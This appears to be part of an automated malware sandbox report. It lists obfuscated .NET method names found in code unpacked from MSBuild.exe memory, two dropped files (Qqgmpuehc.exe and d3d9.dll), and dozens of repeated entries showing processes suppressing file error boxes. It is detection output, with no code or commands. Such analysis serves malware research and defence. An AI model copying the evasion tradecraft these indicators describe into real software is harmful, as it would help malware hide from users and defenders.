                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, GaM8BJiPLPU7o8wNO7B.csHigh entropy of concatenated method names: 'XCUaPrvW3qcWDU84G8e', 'zoQhnovOG5uQHNZIrk1', 'A010tAMq5P', 'rm13Gyvge2fTinF5Xru', 'nBxC2svtRCQAhoo0oP2', 'kgjouVvJWn6kveaok1v', 'HAePx4vqYlCOnxN330s', 'wa4W2Dv1xEEA3GRVfgt', 'YkMVosvXnf9Np4gVYNa', 'bAAS2GvebdFhYrDKS5u'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, cy4KBCixP8iwxjhIPH3.csHigh entropy of concatenated method names: 'DJreWcr52x', 'VCYgN0vBMkNZHERnnQU', 'sbxWS1vStHhRVyv09XS', 'jDGuORvZ2C0u1faCVHB', 'nmbMiZvEu0232cVmsBD', 'lpnaJSv2jpZbljIpIRu', 'KB50JQvNyB87ZblPgyB', 'F4Qf0DvHNKLGKgLek6X'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, rKp2YfihSiQO2BWnfRg.csHigh entropy of concatenated method names: 'vNGiwIrpI4', 'i4Ki6alK0y', 'eTaHbLfuwxRfjv6vu8H', 'dPV5EifRR8QLpNl4psf', 'glQVQ6fbKd0SVTO1yBF', 'QcSFMNfxoXtWT3XOHE1', 'DYpwkufYpQ8ok2w7csQ', 'bmQ5dsfCF2g5mYUnIAn', 'jSTGqbfIR4ArSZeoZlZ', 'YHhCHpfPprIma9wXguq'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, D2kvTGJyCwouiR5kZJ.csHigh entropy of concatenated method names: 'Gh61P4AK0', 'ysRXkhSim', 'Bvee1NHgy', 'AsgG1wJws', 'IpIUJxXhB', 'DDkmFS6CY', 'WTPaA63cX', 'uXWFiyPUd', 'P3dFuXWJBEgj1fodyUv', 'P7YoQcWqVIyjtNQaBLC'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, CZpqneIqpZYS30hfoN.csHigh entropy of concatenated method names: 'AJ8nSsP25', 'fVizkQE2T', 'NAk871aqBM', 'vFV88SJtt5', 'X1F8kvveFm', 'eaa8Qr0XHb', 'IJZ8DHSayL', 'V8c8KZtJ8D', 'KHL8dQOCqu', 'M9S85vGOfw'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, e0VlF1io2a1calbAYmB.csHigh entropy of concatenated method names: 'iKXiuyc0QD', 'UYxiRBL2rl', 'dZZ1oWvknsgHLoci0xE', 'U1msaAvQEVIVaKY3TbX', 'ir0Vo4v7ydwrjD6e8A0', 'Fw1E21v8yuGOwRw3cVu', 'q9S4eYvD7MFQltaSPxM', 'tDuwxgvKt0q9Wdhf8Vy', 'kcPN2Pvd5FDcR3vH0Vp', 'h1PSrNv5V4XGM7cuQS6'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, AMAuhwiFl6JPJLRiu22.csHigh entropy of concatenated method names: 'MsZi9L0Rgn', 'JWMiTNuv5e', 'UfSlYafrJGbMnQkevMW', 'LtTWKZf9ny3BsdVBjoB', 'nv4DEBfTeqmfmJOCXaJ', 'ObT3Vefhh6cFGeP27uQ', 'sKBl0kf3Hl3RqyYxnWl', 'AjraCjfwKDUVSIeViSX', 'kddOprfasL07UZgogXa', 'p9kwhZfFHyoy2mrt3Bo'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, MIVvgHs9kW9FODZtoF.csHigh entropy of concatenated method names: 'N352hBR6m', 'cB5BGCMAVBIu0VCVNks', 'J0nAFnMfpvYN7tVpU78', 'b2xrPPMv3hLdaUtbv4e', 'lROI6aMg9rVCm7j1b9e', 'zRLyxVMt3m2WL73tF2Q', 'ORcH37MJJtyZyNj9Wfy', 'fv2KpfMqwrXoKnF3Y80', 'y8hfSAM12Eq7TQatPFk', 'kCpwecMXw5nuZyl495E'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, f6TXsDOCwuwmVd5CNx.csHigh entropy of concatenated method names: 'eU2fa34Td', 'CTmvfn8Ax', 'YeQgjNR4m', 'p2yt43T3S', 'iq5994WWb9DJYqYyWDC', 'PhhaYWWO3UqJkRV61i6', 'i1ECcVWjcxRceUTVevX', 'X97hZAWMVPHrAxOTBMF', 'YuvNBPWAN7XN6m3Tve6', 'gE9wNNWfRuyYQTZyudL'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, A6329yivyFSUajPuuI1.csHigh entropy of concatenated method names: 'yNMithyZIg', 'iQ0iJIxueR', 'udtiqfEgnX', 'fOli1dFYO2', 'AX6iX3uBrQ', 'FJQNgifcZs4lUd0D09P', 'YAXVohfsuRq9rflOEZC', 'Dj5M0lfVpyqc0J8evT7', 'jfQJO9f2wFslh4IrEpS', 'x6cJq8fNKTJTbfHyE6d'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, zmfmJr0YNKC5P1vStNr.csHigh entropy of concatenated method names: 'W7pcdlffOv', 'kArc5dGsnw', 'MCvcyKbSDb', 'HmOciheB4r', 'eOhc4PAxds', 'jB8c0CDxtq', 'b9Icc84loS', 'g0Ycs6FV0n', 'EJJcV0b2C0', 'Dylc21O1XO'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, fjjqGO0hvSRjxJxcUeI.csHigh entropy of concatenated method names: 'AF20x1YmIB', 'wsZ0taVnKm', 'xbH0J6RXP7', 'Y4t0W2AgSG', 'S1H0L2l8pg', 'Rpc0EiHn6i7klJ8lFk3', 'SoMMBJHCqZdWefTJ1ai', 'xO9sKqHEj0qoaUwVNWw', 'zSe0NdHN0VMTUoFnRKK', 'EG9CmjH7QVioNuFmcHO'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, c76rLuc1OPxJNrkrpt4.csHigh entropy of concatenated method names: 'keAcv8DI2S', 'VJqcrmNP4P', 'v2XcoWpK4C', 'F67cpAE39U', 'ln9cQ6AqHt', 'Lmtc8nNuvd', 'zrfrcPVQITEYEwYMurR', 'CIU0Q3V86qxuaXBOkGa', 'g8HtwVVSy0O1gIBscMM', 'OLYwydVHFE15H7ikuPF'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, KVctFT4fKsCBP9YdbF1.csHigh entropy of concatenated method names: 'VDkO2KEDY9', 'Mrey0BSyl0KUPrCEJqR', 'PQMykiSmea7nKZnd3nc', 'Os0OleVK2y', 'zXsOqPFu4b', 'mhsO5SYJK6', 'PM3OAqAXns', 'S9YOGrF8oZ', 'etoOXNM2fw', 'PI6OaY2a1V'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, LWicU8cUFDjquI2bNSm.csHigh entropy of concatenated method names: 'i8jctrmqyh', 'cAccJfZV5e', 'I4ecWd2eAv', 'mR7cL8Mq3f', 'G9W0SRVEIAydilT8RWH', 'CG028hVND7k2q7vm85T', 'Uj3oQMV928muJGp9AfO', 'DYvHcAVBYEVFy0AesqZ', 'RnwQ4fVnUnZrVadaGFi', 'b9g7G0VCOmfur5CYTPx'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, capBNy2GiHYRX4XiCVP.csHigh entropy of concatenated method names: 'atc2ab3cZA', 'F3A2kQSAkO', 'c3H22PYfPM', 'hgn6E4QRQb9J5k3WDBL', 'VRyBJGQyEUGsB5N4iIj', 'ei7qGdQmpRElcGIMXyg', 'jiws5fQgYujAI40bmHG', 'R1PtvqQikPAlI0J663o'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, QTS7vvOYTtKRPZYqZ6A.csHigh entropy of concatenated method names: 'aKrOb2ldHD', 'VRuORfiiCU', 'gTJOyHBlAl', 'B7rOmrQ58V', 'peCOgFoTOf', 'Fy5OiqAhlq', 'iAhBbhSoFBIwQ7eZvg8', 'beWHlLSpAlnW63Hhc1V', 'eL5XI1SQOTQufbpSnT7', 'jEgcWMS81YvkK30nWyT'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, qweCvpqeoUr8cKH2XNm.csHigh entropy of concatenated method names: 'IhbqUwoVHD', 'YgO0xmvB33tAr3oxLHT', 'bdQEjZvLlbbgsBL46Iy', 'Q1jauOv9nWJWb6OpFaP', 'nVbtZsvEqp1OKu7H4XX', 'O6UpefvNJCIarRdkNfp'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, Y6eVC24FQ8H9gXRSZrT.csHigh entropy of concatenated method names: 'nvc4rsFRKL', 'HYqqif8VFHW7pJrpKCk', 'tuqhaI8PVdl2Tp3PTAa', 'H549e78jwTcjhtE1xd3', 'XgE1x98I5MwKQeHup3Z', 'jqXbHd8M7QUoyB2rgKY'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, GADkTJGjt66Zhh45eWP.csHigh entropy of concatenated method names: 'vhYGMaoZlQ', 'DCjGdVI5Ou', 'CDeGuqTbTc', 'LsdGeaKurB', 'gvRGh3utUS', 'uf5GUReBLu', 'e5UGx63nGa', 'ia0GtkAfL6', 'mcyGJqOQFy', 'oBeGW3k25q'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, lsLDSyAHWOyIGYCoPFq.csHigh entropy of concatenated method names: 'Mi1AVIkNUd', 'Cn4APaFTI5', 'IbEAjZRtid', 'Sj0AIIcF6m', 'W80AMsZy7P', 'SohAd3X2NR', 'DBtAuIHTRd', 'MRgtBYoFTWyoZcwpJbv', 'aYbZwJovwV99W5Jp7Xk', 'AAnWt6orjFoOvdE76sK'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, dHooNxRvjakWUVogZLS.csHigh entropy of concatenated method names: 'VFaRoK7FOQ', 'a9GRpELIJ7', 'sRUrMWjoKq5LXS12hdj', 'i6GNZRjpYr1uhriVWJx', 'CO6RI6jQ7NTYtB4RRqI', 'n84FpNjvxa4XHurbLIc', 'PnyAnsjr4juUyJhhNTP', 'pxsLT0j8glPdfa3EeCE'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, gQEQoo2VcsIuCsZJLev.csHigh entropy of concatenated method names: 'PjK2jQmhWI', 'vvr2IwBejI', 'CMK2MaSywn', 'XZN2doM9bc', 'svC2u3T3ds', 'r8X2eixIVy', 'hb42hIvCCO', 'ddo2UQisur', 'rU22xhdFkl', 'aSJ2ty6ZCQ'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, sG4wt3YlZNNtpsfVAHe.csHigh entropy of concatenated method names: 'wTsYayCV7O', 'dPlYkYtZwb', 'S2EY23V3Zw', 'kRgYKAa4K5', 'zSCY4eUUMc', 'apW4E0P01TCE10leSTd', 'e7tOeNP3WgHvQ6cIQC4', 'sw1Y5pN8dE', 'GL1YAqxEOM', 'NJvYGkVPwM'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, RQaSWVOoOVrpvJ7k2mi.csHigh entropy of concatenated method names: 'oEoOQGnUGx', 'JZpO8e2Zc2', 'NsCOSNgHBr', 'a78OHgXYGZ', 'tTROD1NmCe', 'z60OVAsa8D', 'EGJj4rSd88ge2fwqxeN', 'ebwo1WSuD2Es4xAkS3o', 'uH9Bs5Se4PdZ5rHy5Bv', 'oeksrDShdoLlqmqaalr'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, BvK8wPBQakvfJfnIbN.csHigh entropy of concatenated method names: 'F11NuHd5K', 'uSenOUUWP', 'C9DCxVlsp', 'Qq47TaSfr', 'Vq9fsKi2q', 'skwzYHmMj', 'OUtql2FQC4', 'jLjqqiHC5t', 'Nqyq5jxaxX', 'Y9KURtvZcSB4OPWRhtp'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, brNUMWZI1ElyPmCgnRu.csHigh entropy of concatenated method names: 'i1GZdH0Avl', 'dqnC2bDfGtBT4BE99uu', 'YcJJ7eDzTcAw8h9LEdZ', 'JjZjU5VldrRIBMSuhCo', 'PZ01fOVqkafjy3O2wlv', 'HBk1lHV5t8YNkFfiKKk', 'TGxnAVVA4S5GyGBbThG'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, IrLmSMG0fWWgKF2TQDw.csHigh entropy of concatenated method names: 'opRGs3jyJv', 'iDAqBhplRSoH1TYDnLj', 'bJrh4spqk8AnstK7WcS', 'svcdcqof1Bo7kSJUK0M', 'es1ZYmozgwgiZJ1w3eb', 'j7QIOgp5lFpNwXXkVvn'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, RnY12TA5klXPLyiySWo.csHigh entropy of concatenated method names: 'beqAGma09m', 'eZ7OHJrUQ9CjlHskXuA', 'AOHyn8rxiuTc1VL3V6B', 'uk5ICRrtpO1ggnvZBQJ', 'hqFfMZrJ5cywgZNg8nu', 'd1d0JlrWMyAfNcLOntG'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, wpDAL1bFuWcemcdRqgf.csHigh entropy of concatenated method names: 'Dispose', 'i9sQ4xPLcpWsW1xeLRR', 'fRcMgkP9iaql0yVLpAA', 'hi0vKPPJqVtCrakcvFA', 'ktf2FjPWyNYn5gD3Znv', 'aAEqCjPBDkEnComCrNU', 'Fcr5rvP750hR2NqcMIu', 'K440g9Pf89ixy2w0RxY', 'XjsoV6jlQSq2cX13C14', 'bp5wpljqVN9ML7GMRAb'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, uycrb3qxQqQjSqdftZo.csHigh entropy of concatenated method names: 'XvHqNM8i4m', 'xkoskJrAuc4kQLMGMVj', 'qtn4sNrGS1gLLhIx9dm', 'bgrGX5rXHYrZB96kHEG', 'wmBqCda7RA', 'uqwq7y98uN', 'G0f6YgrkCiugKys1GG4', 'QvWUEpr2cg1jZ5Xr2wf', 'BFCfCsrK3L0NB4JXkoG', 'jnS5qmcacK'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, EjD3KIZhYgXxF43EgY5.csHigh entropy of concatenated method names: 'qEbZnAs6M4', 'GvKZCIodE8', 'ExcZ7EQK3l', 'mHJZf8yhkC', 'ctxZztLcjd', 'daPclw0mhE', 'pBHcqNFDfp', 'njbc5mJeQq', 'WWjcAgsXxA', 'jAycG17NjV'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.csHigh entropy of concatenated method names: 'imhGt1I1Im3ufkwam41', 'PlTJGYIFh6TVNxujhVr', 'nLE1lFTMhl', 'BsqWOhIpECspVDi6fCq', 'OBfv2cIQtBukdT01ZJv', 'aukMsnI8EdPArDyUrvM', 'eMrp0sISmRmTMgBsk7y', 'g38PJ8K3c0', 'MAI1kVyT98', 'tir12s4ZQk'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, qXwNvgTDO5S0rFRG02E.csHigh entropy of concatenated method names: 'k5MTPTwBYj', 'trmTjIt6bc', 'AGEYk1H5N0i5J63YLqk', 'qumGAWHALTl1Mxp8nvB', 'FsoKxMHGg9OFwmdSFZ9', 'IatPhFHXwcyKWv9NbQV'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, w5VySpAKsAdWEyeyh1L.csHigh entropy of concatenated method names: 'vrcAgrkF6Y', 'DdH7oroAx4Ppccson9c', 'W2KNUQoGHhDJSw0KUJi', 'Ne3LyQoXnxIgvZ99OUN', 'BeyAOeJyrt', 'ABxATHyJRj', 'xqGA0krbeu', 'SaeA3l4aub', 'dTxAsIYxYy', 'h4vAZjAJma'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, TkyIPcTNhQ8Ovm9sZYS.csHigh entropy of concatenated method names: 'Dispose', 'y9YgafHQpjmGKFNspOe', 'rFiEGxHo4W1nhuEmSKM', 'WbvFqeHphbXrEhLNFjq', 'Paf2rfH81MWd0rpiu2m', 'I4MWZcHSGJqpw4VopnR', 'l6bXxBHjILZdecy1MRE', 'IqjBObHIU0jeo61ejhY', 'uVFwmIHdLT8Q2hEDn2l', 'n4BRSGHukFJU70Jl5Ph'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, EyUmHpZDAWAhWQsv4H.csHigh entropy of concatenated method names: 'kTTYgxC8A', 'hIxwQiU4H', 'p1ubTB1J5', 'aFXRLhwMe', 'i1YymCTq4', 'acqmXkc9w', 'tyygjXBgU', 'PWDiBxGL4', 'MisQgdFL5SrD4rj9naF', 'snv6vqF92g7BFBUM994'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, bydUEn1gUAnWL8Sm347.csHigh entropy of concatenated method names: 'oNX1HjqGxN', 'AYT1DJ7UPw', 'YMX1VstA8C', 'gBK1PBi2rO', 'rIQ1jGPqD2', 'vlq1I91W2f', 'gco1MENaQu', 'nyc1d7U8sY', 'ELc1uYyGYB', 'YvC1ePxDVd'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, ixlaSY2QcGIF0ZrQ9oo.csHigh entropy of concatenated method names: 'JaZ2SO2X7e', 'WAH4FmQ9joH5YHsHG7j', 'B8QnH2QBjbAoAjWMuvZ', 'w07JPvQELkVWdYsBoAv', 'm9kGYWQNkEuHC1SB86v', 'B1jMFcQnh6KA3va8YTx', 'R2N8iqQCssag00ptMpB', 'pW7Z4CQ7j6ILKNdcxji', 'PSLlQ3QfJP7EICD4dhK', 'Wohc4rQzH0OaPEfc2qh'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, WlMuBdkKbKfnmwLWtGp.csHigh entropy of concatenated method names: 'me1k12vXlD', 'NyBkFaulHD', 'SFDkvrRDRh', 'yPmkr33ZVp', 'mYckoq9URi', 'OaTkpZvcAj', 'c3tkQA5Z2D', 'n7rm1AQq83T7ss7mQYp', 'fLy9ctQ5F0ouCqWBvw3', 'xZAkOUFnA0'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, jUitfU32YZ4hZJ2eSoH.csHigh entropy of concatenated method names: 'NyqYwND3lVsYr1ku6Jf', 'EOxSXkDTlWomfSjLLyH', 'vpsi7WD0npQ7kgL9ZY9', 'xNP3b6undG', 'blgna1DZY8oX1kt9YAR', 'fuRI3dDctJUsIyacGdw', 'KRc3gNchLj', 'd6cn9DDwJ6jN1ahg4nN', 'IwLYktDbSOvQmRfuP09', 'utxMWADRAf3NeZD23CO'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, IBj3d7ZpmxOtqvjDy0U.csHigh entropy of concatenated method names: 'OPuZ8hvP8C', 'qAMZSXaPH7', 'cmgZHvrxis', 'sQcZDccxrV', 'aAOZV924k8', 'niEcnPDLFoYJUZXmZso', 'gbI44LD9Tj3ycnZABaH', 'sFer3nDBefsvHbAv7g2', 'vuSW3ZDEJsrpaLXyr7c', 'wWCXpTDNsR1y1Utn1cs'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, YJAGZ7icGnV2a4pdkrT.csHigh entropy of concatenated method names: 'TeyiwiH278', 'Xh0ibgLdmI', 'voSiR1XnEu', 'Rhtiy2wAIx', 'i2Kimce972', 't3OFepIXEm1CLjZofvn', 'yOab3jIaZnLuGdpUIJe', 'ebAkkQIk2goJ00IEAv5', 'aSEF3wI2Bcsi6UiDwrf', 'nhbGxnIKQ8xpn1cCxmQ'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, p2HRsp3Q0I4hnP6bNEB.csHigh entropy of concatenated method names: 'ifm3SANe8l', 'YVd3Hl8yrl', 'M2B3DQ82pX', 'K2orncDofFyK7VBiahG', 'jZaVOKDvkTunX7h5ATK', 'qgh8bDDrI2MCYGrbiZP', 'MvowXDDpkrnp48uws3F', 'DIoCS0DQHopsrKnPt7Y', 'snt9wZD8cAPxqsh4YWa'
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, vwocD72mPkO9LGGkJbE.csHigh entropy of concatenated method names: 'F3Z21O50Sg', 'FcFWKBQutD8RLLVMWxm', 'BvCB46Qe6DjYxoMpT5H', 'KRNgELQhVThLQRkxZNG', 'UqphZiQUHIp4dmUrgex', 'nuGoWJQx9q29reswBlS', 'SUS2iW3sqK', 'MVx9dCQPUC31sYpl6LZ', 'cfq1jmQjnMXJBxOyhB2', 'uti2l7QIOKWqRmJ7c0H'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
